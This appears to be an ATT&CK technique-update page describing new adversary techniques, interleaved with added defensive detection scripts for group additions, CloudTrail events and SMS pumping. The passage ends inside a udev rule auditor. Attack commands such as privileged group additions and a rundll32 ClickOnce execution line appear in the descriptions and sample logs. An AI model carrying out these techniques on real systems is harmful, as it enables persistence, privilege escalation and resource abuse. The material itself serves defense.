These ATT&CK Navigator layer files can be uploaded to ATT&CK Navigator manually.
New Techniques
[T1098.007] Account Manipulation: Additional Local or Domain Groups
Current version: 1.0
Description: An adversary may add additional local or domain groups to an adversary-controlled account to maintain persistent access to a system or domain.
On Windows, adversaries may use the `net localgroup` and `net group` commands to add existing users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation: Microsoft Net Group) On Linux, adversaries may use the `usermod` command for the same purpose.(Citation: Linux Usermod)
For example, accounts may be added to the local administrators group on Windows devices to maintain elevated privileges. They may also be added to the Remote Desktop Users group, which allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On Linux, accounts may be added to the sudoers group, allowing them to persistently leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003) for elevated privileges.
In Windows environments, machine accounts may also be added to domain groups. This allows the local SYSTEM account to gain privileges on the domain.(Citation: RootDSE AD Detection 2022)
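A defender-side check for the group additions described above, added here as an example (it is not code from MITRE or the ATT&CK release notes): it scans process-creation records for the `net localgroup` / `net group` `... /add` and `usermod -G` forms named in the description and flags additions to the sensitive groups the description lists, marking Windows machine accounts (names ending in `$`) separately. The log lines and their tab-separated layout (timestamp, host, actor, command line) are constructed, and the inclusion of the `wheel` group is an assumption.

```python
"""
Added example (not from the ATT&CK release notes): flag process-creation
records in which an account is added to a privileged local or domain group,
the behaviour described for T1098.007. The log lines are constructed and
their tab-separated layout (timestamp, host, actor, command line) is an
assumption, not a real product's schema.
"""
import re
import shlex
from dataclasses import dataclass

# Groups the description names, plus "wheel", the sudo-equivalent group on
# RHEL-family hosts (assumption).
SENSITIVE_GROUPS = {"administrators", "domain admins", "remote desktop users", "sudo", "wheel"}

# net localgroup <group> <member> /add   and   net group <group> <member> /add [/domain]
WIN_NET_ADD = re.compile(
    r'(?i)\bnet1?(?:\.exe)?\s+(?:localgroup|group)\s+("[^"]+"|\S+)\s+("[^"]+"|\S+)\s+/add\b'
)


@dataclass
class Finding:
    host: str
    actor: str
    member: str
    group: str
    machine_account: bool   # Windows computer accounts end in '$' (the SYSTEM-to-domain case above)
    command: str


def parse_net_add(cmd):
    """(group, member) for a 'net localgroup|group ... /add' command line, else None."""
    m = WIN_NET_ADD.search(cmd)
    if not m:
        return None
    return m.group(1).strip('"'), m.group(2).strip('"')


def parse_usermod(cmd):
    """(groups, member) for a usermod call that adds supplementary groups, else None."""
    try:
        argv = shlex.split(cmd)
    except ValueError:          # unbalanced quotes: nothing we can interpret safely
        return None
    if len(argv) < 3 or argv[0].rsplit("/", 1)[-1] != "usermod":
        return None
    groups = None
    for i, tok in enumerate(argv):
        if tok in ("-G", "-aG", "-Ga", "--groups") and i + 1 < len(argv):
            groups = argv[i + 1]
        elif tok.startswith("--groups="):
            groups = tok.split("=", 1)[1]
    if groups is None:
        return None
    return groups.split(","), argv[-1]


def scan(log_lines):
    """Return a Finding for every command that puts a member into a sensitive group."""
    findings = []
    for line in log_lines:
        fields = line.rstrip("\n").split("\t")
        if len(fields) != 4:
            continue
        _ts, host, actor, cmd = fields
        pairs = []
        net = parse_net_add(cmd)
        if net:
            pairs = [net]
        else:
            um = parse_usermod(cmd)
            if um:
                pairs = [(g, um[1]) for g in um[0]]
        for group, member in pairs:
            if group.lower() in SENSITIVE_GROUPS:
                findings.append(Finding(host, actor, member, group, member.endswith("$"), cmd))
    return findings


# Constructed sample records: four should alert, two should not.
SAMPLE_LOG = [
    "2024-10-15T10:01:12Z\tWKS-0143\tCORP\\svc_backup\tnet localgroup Administrators CORP\\jdoe /add",
    "2024-10-15T10:02:40Z\tWKS-0143\tCORP\\helpdesk\tnet localgroup \"Remote Desktop Users\" CORP\\asmith /add",
    "2024-10-15T10:03:05Z\tDC01\tCORP\\ops\tnet group \"Domain Admins\" CORP\\WKS-0143$ /add /domain",
    "2024-10-15T10:04:33Z\tWKS-0143\tCORP\\jdoe\tnet user jdoe",
    "2024-10-15T10:05:10Z\tbuild-07\troot\tusermod -aG sudo deploy",
    "2024-10-15T10:05:12Z\tbuild-07\troot\tusermod -aG docker,audio deploy",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        tag = " (machine account)" if f.machine_account else ""
        print(f"{f.host}: {f.actor} added {f.member}{tag} to '{f.group}': {f.command}")
```

Command-line matching is only one signal; the same additions also surface in directory and host audit logs, so in production this check belongs beside group-membership auditing rather than in place of it.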
[T1496.002] Resource Hijacking: Bandwidth Hijacking
Current version: 1.0
Description: Adversaries may leverage the network bandwidth resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.
Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage in internet-wide scanning in order to identify additional targets for compromise.(Citation: Unit 42 Leaked Environment Variables 2024)
In addition to incurring potential financial costs or availability disruptions, this technique may cause reputational damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig Proxyjacking)
[T1558.005] Steal or Forge Kerberos Tickets: Ccache Files
Current version: 1.0
Description: Adversaries may attempt to steal Kerberos tickets stored in credential cache files (or ccache). These files are used for short-term storage of a user's active session credentials. The ccache file is created upon user authentication and allows for access to multiple services without the user having to re-enter credentials.
The `/etc/krb5.conf` configuration file and the `KRB5CCNAME` environment variable are used to set the storage location for ccache entries. On Linux, credentials are typically stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`. On macOS, ccache entries are stored by default in memory with an `API:{uuid}` naming scheme. Typically, users interact with ticket storage using `kinit`, which obtains a Ticket-Granting-Ticket (TGT) for the principal; `klist`, which lists obtained tickets currently held in the credentials cache; and other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense Kerberos Linux)
Adversaries can collect tickets from ccache files stored on disk and authenticate as the current user without their password to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks. Adversaries can also use these tickets to impersonate legitimate users with elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004). Tools like Kekeo can also be used by adversaries to convert ccache files to Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008). On macOS, adversaries may use open-source tools or the Kerberos framework to interact with ccache files and extract TGTs or Service Tickets via lower-level APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
[T1127.002] Trusted Developer Utilities Proxy Execution: ClickOnce
Current version: 1.0
Description: Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment technology that enables a user to create self-updating Windows-based .NET applications (i.e., .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
[T1496.004] Resource Hijacking: Cloud Service Hijacking
Current version: 1.0
Description: Adversaries may leverage compromised software-as-a-service (SaaS) applications to complete resource-intensive tasks, which may impact hosted service availability.
For example, adversaries may leverage email and messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification Service (SNS), SendGrid, and Twilio, in order to send large quantities of spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking 2024)
In some cases, adversaries may leverage services that the victim is already using. In others, particularly when the service is part of a larger cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking 2024) Leveraging SaaS applications may cause the victim to incur significant financial costs, use up service quotas, and otherwise impact availability.
[T1496.001] Resource Hijacking: Compute Hijacking
Current version: 1.0
Description: Adversaries may leverage the compute resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.
One common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001) is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001) and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)
Additionally, some cryptocurrency mining malware identifies and then kills off processes belonging to competing malware to ensure it is not competing for resources.(Citation: Trend Micro War of Crypto Miners)
[T1213.004] Data from Information Repositories: Customer Relationship Management Software
Current version: 1.0
Description: Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
[T1557.004] Adversary-in-the-Middle: Evil Twin
Current version: 1.0
Description: Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia ‘Evil Twin’)
By using a Service Set Identifier (SSID) of a legitimate Wi-Fi network, fraudulent Wi-Fi access points may trick devices or users into connecting to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium evil twin) Adversaries may provide a stronger signal strength or block access to Wi-Fi access points to coerce or entice victim devices into connecting to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple – a network security auditing and penetration testing tool – may be deployed in Evil Twin attacks for ease of use and broader range. Custom certificates may be used in an attempt to intercept HTTPS traffic.
Similarly, adversaries may also listen for client devices sending probe requests for known or previously connected networks (Preferred Network Lists or PNLs). When a malicious access point receives a probe request, adversaries can respond with the same SSID to imitate the trusted, known network.(Citation: specter ops evil twin) Victim devices are led to believe the responding access point is from their PNL and initiate a connection to the fraudulent network.
Upon logging into the malicious Wi-Fi access point, a user may be directed to a fake login page or captive portal webpage to capture the victim’s credentials. Once a user is logged into the fraudulent Wi-Fi network, the adversary may be able to monitor network activity, manipulate data, or steal additional credentials. Locations with high concentrations of public Wi-Fi access, such as airports, coffee shops, or libraries, may be targets for adversaries to set up illegitimate Wi-Fi access points.
[T1485.001] Data Destruction: Lifecycle-Triggered Deletion
Current version: 1.0
Description: Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within.
Cloud storage buckets often allow users to set lifecycle policies to automate the migration, archival, or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation: GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor has sufficient permissions to modify these policies, they may be able to delete all objects at once.
For example, in AWS environments, an adversary with the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle` API call to apply a lifecycle policy to an S3 bucket that deletes all objects in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657), adversaries may also perform this action on buckets storing cloud logs for [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation: Datadog S3 Lifecycle CloudTrail Logs)
[T1059.011] Command and Scripting Interpreter: Lua
Current version: 1.0
Description: Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command line (through the stand-alone `lua` interpreter), via scripts (`.lua`), or from Lua-embedded programs (through the struct `lua_State`).(Citation: Lua main page)(Citation: Lua state)
Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
[T1036.010] Masquerading: Masquerade Account Name
Current version: 1.0
Description: Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign. This will typically occur during [Create Account](https://attack.mitre.org/techniques/T1136), although accounts may also be renamed at a later date. This may also coincide with [Account Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first deletes an account before re-creating one with the same name.(Citation: Huntress MOVEit 2023)
Often, adversaries will attempt to masquerade as service accounts, such as those associated with legitimate software, data backups, or container cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec Kubernetes Attack 2023) They may also give accounts generic, trustworthy names, such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware 2024) Sometimes adversaries may model account names off of those already existing in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
Note that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656), which describes impersonating specific trusted individuals or organizations, rather than user or service account names.
[T1213.005] Data from Information Repositories: Messaging Applications
Current version: 1.0
Description: Adversaries may leverage chat and messaging applications, such as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
The following is a brief list of example information that may hold potential value to an adversary and may also be found on messaging applications:
* Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
* Source code snippets
* Links to network shares and other internal resources
* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)
* Discussions about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker 2021)(Citation: Microsoft DEV-0537)
In addition to exfiltrating data from messaging applications, adversaries may leverage data from chat messages in order to improve their targeting - for example, by learning more about an environment or evading ongoing incident response efforts.(Citation: Sentinel Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)
[T1666] Modify Cloud Resource Hierarchy
Current version: 1.0
Description: Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses.
IaaS environments often group resources into a hierarchy, enabling improved resource management and application of policies to relevant groups. Hierarchical structures differ among cloud providers. For example, in AWS environments, multiple accounts can be grouped under a single organization, while in Azure environments, multiple subscriptions can be grouped under a single management group.(Citation: AWS Organizations)(Citation: Microsoft Azure Resources)
Adversaries may add, delete, or otherwise modify resource groups within an IaaS hierarchy. For example, in Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources. They may also engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant. This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm 2023)(Citation: Microsoft Subscription Hijacking 2022)
In AWS environments, adversaries with appropriate permissions in a given account may call the `LeaveOrganization` API, causing the account to be severed from the AWS Organization to which it was tied and removing any Service Control Policies, guardrails, or restrictions imposed upon it by its former Organization. Alternatively, adversaries may call the `CreateAccount` API in order to create a new account within an AWS Organization. This account will use the same payment methods registered to the payment account but may not be subject to existing detections or Service Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)
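A CloudTrail triage routine for the two AWS behaviours described on this page, the lifecycle policy that expires a whole bucket on a short fuse (T1485.001, Lifecycle-Triggered Deletion) and the `LeaveOrganization` / `CreateAccount` calls just described (T1666). This is an added example, not code from MITRE or the release notes. The records are constructed; they follow CloudTrail's general shape (`eventSource`, `eventName`, `userIdentity`, `requestParameters`), but the exact `requestParameters` keys for the lifecycle call and the seven-day threshold are assumptions to be checked against real logs.

```python
"""
Added example (not from the ATT&CK release notes): triage CloudTrail records
for a short-fuse whole-bucket S3 lifecycle expiration (T1485.001) and for
Organizations calls that detach or add accounts (T1666). Records below are
constructed; the requestParameters layout for PutBucketLifecycle is an
assumption and should be verified against real CloudTrail output.
"""
import json

MAX_BENIGN_EXPIRATION_DAYS = 7  # assumption: whole-bucket expiry at or under a week warrants review


def _as_list(value):
    """CloudTrail serialises a single lifecycle rule as a dict, several as a list."""
    return value if isinstance(value, list) else [value]


def _rule_prefix(rule):
    """Prefix a lifecycle rule is scoped to; '' means every object in the bucket."""
    if rule.get("Prefix") is not None:
        return rule["Prefix"]
    return (rule.get("Filter") or {}).get("Prefix") or ""


def triage_event(event):
    """Return (technique_id, summary) when a record matches, else None."""
    source = event.get("eventSource")
    name = event.get("eventName")
    params = event.get("requestParameters") or {}
    actor = (event.get("userIdentity") or {}).get("arn", "unknown")

    if source == "s3.amazonaws.com" and name in ("PutBucketLifecycle", "PutBucketLifecycleConfiguration"):
        cfg = params.get("LifecycleConfiguration") or {}
        for rule in _as_list(cfg.get("Rule") or []):
            if rule.get("Status") != "Enabled":
                continue
            days = (rule.get("Expiration") or {}).get("Days")
            if days is not None and int(days) <= MAX_BENIGN_EXPIRATION_DAYS and _rule_prefix(rule) == "":
                return ("T1485.001",
                        f"{actor} set a {days}-day whole-bucket expiration on {params.get('bucketName')}")
        return None

    if source == "organizations.amazonaws.com":
        if name == "LeaveOrganization":
            return ("T1666", f"{actor} detached account {event.get('recipientAccountId')} from its organization")
        if name == "CreateAccount":
            return ("T1666", f"{actor} created member account {params.get('accountName')!r}")
    return None


def triage(records):
    """Run triage_event over a batch and keep only the hits."""
    return [hit for hit in (triage_event(r) for r in records) if hit]


# Constructed sample batch: records 1, 4 and 5 should alert; 2 and 3 should not.
SAMPLE_RECORDS = json.loads("""[
 {"eventSource": "s3.amazonaws.com", "eventName": "PutBucketLifecycle",
  "userIdentity": {"arn": "arn:aws:iam::111122223333:user/compromised-ops"},
  "recipientAccountId": "111122223333",
  "requestParameters": {"bucketName": "finance-archive",
    "LifecycleConfiguration": {"Rule": [{"ID": "purge", "Status": "Enabled",
      "Filter": {"Prefix": ""}, "Expiration": {"Days": 1}}]}}},
 {"eventSource": "s3.amazonaws.com", "eventName": "PutBucketLifecycle",
  "userIdentity": {"arn": "arn:aws:iam::111122223333:role/storage-admin"},
  "recipientAccountId": "111122223333",
  "requestParameters": {"bucketName": "app-logs",
    "LifecycleConfiguration": {"Rule": {"ID": "rotate", "Status": "Enabled",
      "Filter": {"Prefix": "tmp/"}, "Expiration": {"Days": 30}}}}},
 {"eventSource": "s3.amazonaws.com", "eventName": "GetObject",
  "userIdentity": {"arn": "arn:aws:iam::111122223333:user/analyst"},
  "recipientAccountId": "111122223333", "requestParameters": {"bucketName": "finance-archive"}},
 {"eventSource": "organizations.amazonaws.com", "eventName": "LeaveOrganization",
  "userIdentity": {"arn": "arn:aws:iam::444455556666:user/compromised-ops"},
  "recipientAccountId": "444455556666", "requestParameters": null},
 {"eventSource": "organizations.amazonaws.com", "eventName": "CreateAccount",
  "userIdentity": {"arn": "arn:aws:iam::999999999999:user/compromised-ops"},
  "recipientAccountId": "999999999999",
  "requestParameters": {"accountName": "staging-2", "email": "placeholder@example.com"}}
]""")

if __name__ == "__main__":
    for technique, summary in triage(SAMPLE_RECORDS):
        print(technique, summary)
```

Because a lifecycle deletion fires asynchronously, the `PutBucketLifecycle` record is the only moment at which the action is still reversible; routing that hit to an alert that can be acted on within the expiration window matters more than the detail of the heuristic.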
[T1480.002] Execution Guardrails: Mutual Exclusion
Current version: 1.0
Description: Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
[T1027.014] Obfuscated Files or Information: Polymorphic Code
Current version: 1.0
Description: Adversaries may utilize polymorphic code (also known as metamorphic or mutating code) to evade detection. Polymorphic code is a type of software capable of changing its runtime footprint during code execution.(Citation: polymorphic-blackberry) With each execution of the software, the code is mutated into a different version of itself that achieves the same purpose or objective as the original. This functionality enables the malware to evade traditional signature-based defenses, such as antivirus and antimalware tools.(Citation: polymorphic-sentinelone)
Other obfuscation techniques can be used in conjunction with polymorphic code to accomplish the intended effects, including using mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation: polymorphic-medium)
[T1071.005] Application Layer Protocol: Publish/Subscribe Protocols
Current version: 1.0
Description: Adversaries may communicate using publish/subscribe (pub/sub) application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Protocols such as MQTT, XMPP, AMQP, and STOMP use a publish/subscribe design, with message distribution managed by a centralized broker.(Citation: wailing crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their messages by topics, while subscribers receive messages according to their subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse publish/subscribe protocols to communicate with systems under their control from behind a message broker while also mimicking normal, expected traffic.
[T1070.010] Indicator Removal: Relocate Malware
Current version: 1.0
Description: Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to clean up older artifacts.
Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
[T1496.003] Resource Hijacking: SMS Pumping
Current version: 1.0
Description: Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
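A burst detector for the OTP and verification forms the description identifies as the usual entry point for SMS pumping, added here as an example rather than code from MITRE or any messaging vendor. Pumping traffic targets numbers drawn from one block the fraudster profits from, so the signal used here is many requests landing on a shared number prefix inside a short window. The request log, the window length, the prefix length and the threshold are constructed assumptions to be tuned per service.

```python
"""
Added example (not from the ATT&CK release notes): spot an SMS pumping burst
in OTP / verification request logs by clustering requests on a shared number
prefix within a sliding time window. The log entries, window, prefix length
and threshold are constructed assumptions, not values from the page.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)   # assumption: clustering within five minutes
PREFIX_CHARS = 8                # assumption: '+' plus 7 digits, e.g. '+4477012' (country + operator block)
THRESHOLD = 5                   # assumption: five sends into one block per window is abnormal


def detect_sms_pumping(requests, window=WINDOW, prefix_chars=PREFIX_CHARS, threshold=THRESHOLD):
    """
    requests: iterable of (iso8601_timestamp, source_ip, e164_number).
    Returns one alert per number block whose request count within some
    window-long interval reaches the threshold.
    """
    events = sorted((datetime.fromisoformat(ts), ip, num) for ts, ip, num in requests)
    by_block = defaultdict(list)
    for ev in events:
        by_block[ev[2][:prefix_chars]].append(ev)

    alerts = []
    for block, evs in by_block.items():
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until evs[start..end] spans at most `window`
            while evs[end][0] - evs[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                # threshold reached: extend to every request still inside the window
                stop = end
                while stop + 1 < len(evs) and evs[stop + 1][0] - evs[start][0] <= window:
                    stop += 1
                hits = evs[start:stop + 1]
                alerts.append({
                    "block": block,
                    "requests": len(hits),
                    "distinct_numbers": len({e[2] for e in hits}),
                    "source_ips": sorted({e[1] for e in hits}),
                    "first": hits[0][0].isoformat(),
                    "last": hits[-1][0].isoformat(),
                })
                break  # one alert per block is enough for triage
    return alerts


# Constructed sample: eight OTP requests into one block in ~90 seconds, plus ordinary sign-ups.
SAMPLE_REQUESTS = [
    ("2024-10-15T09:00:00+00:00", "203.0.113.7", "+447701200011"),
    ("2024-10-15T09:00:09+00:00", "203.0.113.7", "+447701200012"),
    ("2024-10-15T09:00:21+00:00", "203.0.113.7", "+447701200013"),
    ("2024-10-15T09:00:33+00:00", "203.0.113.9", "+447701200014"),
    ("2024-10-15T09:00:47+00:00", "203.0.113.7", "+447701200015"),
    ("2024-10-15T09:01:02+00:00", "203.0.113.7", "+447701200016"),
    ("2024-10-15T09:01:15+00:00", "203.0.113.9", "+447701200017"),
    ("2024-10-15T09:01:30+00:00", "203.0.113.7", "+447701200018"),
    ("2024-10-15T09:00:05+00:00", "198.51.100.2", "+14155550123"),
    ("2024-10-15T09:02:40+00:00", "198.51.100.3", "+491701234567"),
    ("2024-10-15T09:03:10+00:00", "198.51.100.4", "+33612345678"),
]

if __name__ == "__main__":
    for alert in detect_sms_pumping(SAMPLE_REQUESTS):
        print(alert)
```

Keying on the number block rather than the source IP matters because pumping traffic is often spread across many clients; the block the messages land in is the one thing the fraud cannot vary.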
[T1546.017] Event Triggered Execution: Udev Rules
Current version: 1.0
Description: Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time a pseudo-device file such as `/dev/random` is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (which blocks network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach the malicious content’s process and run it in the background, bypassing these controls.(Citation: Reichert aon sedexp 2024)
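An audit script for the pattern just described, added here as an example (not code from MITRE or from the cited research): it tokenises udev rules, then flags `RUN` actions that invoke a shell with `-c`, detach or background their child, or reference a world-writable path, and notes when such a rule is keyed to a pseudo-device like `/dev/random`. The rule directories come from the description; the sample rules, the heuristics and the pseudo-device list are constructed assumptions to be tuned against a host's legitimate rules.

```python
"""
Added example (not from the ATT&CK release notes): audit udev rule files for
RUN actions matching the persistence pattern described for T1546.017. The
sample rules are constructed; the heuristics are assumptions.
"""
import re
from pathlib import Path

# Rule directories named in the description; for same-named files the earlier directory wins.
RULE_DIRS = ("/etc/udev/rules.d", "/run/udev/rules.d", "/usr/local/lib/udev/rules.d",
             "/usr/lib/udev/rules.d", "/lib/udev/rules.d")

# KEY[{arg}] op "value"   e.g.  ACTION=="add"   ENV{MAJOR}=="1"   RUN+="/bin/true"
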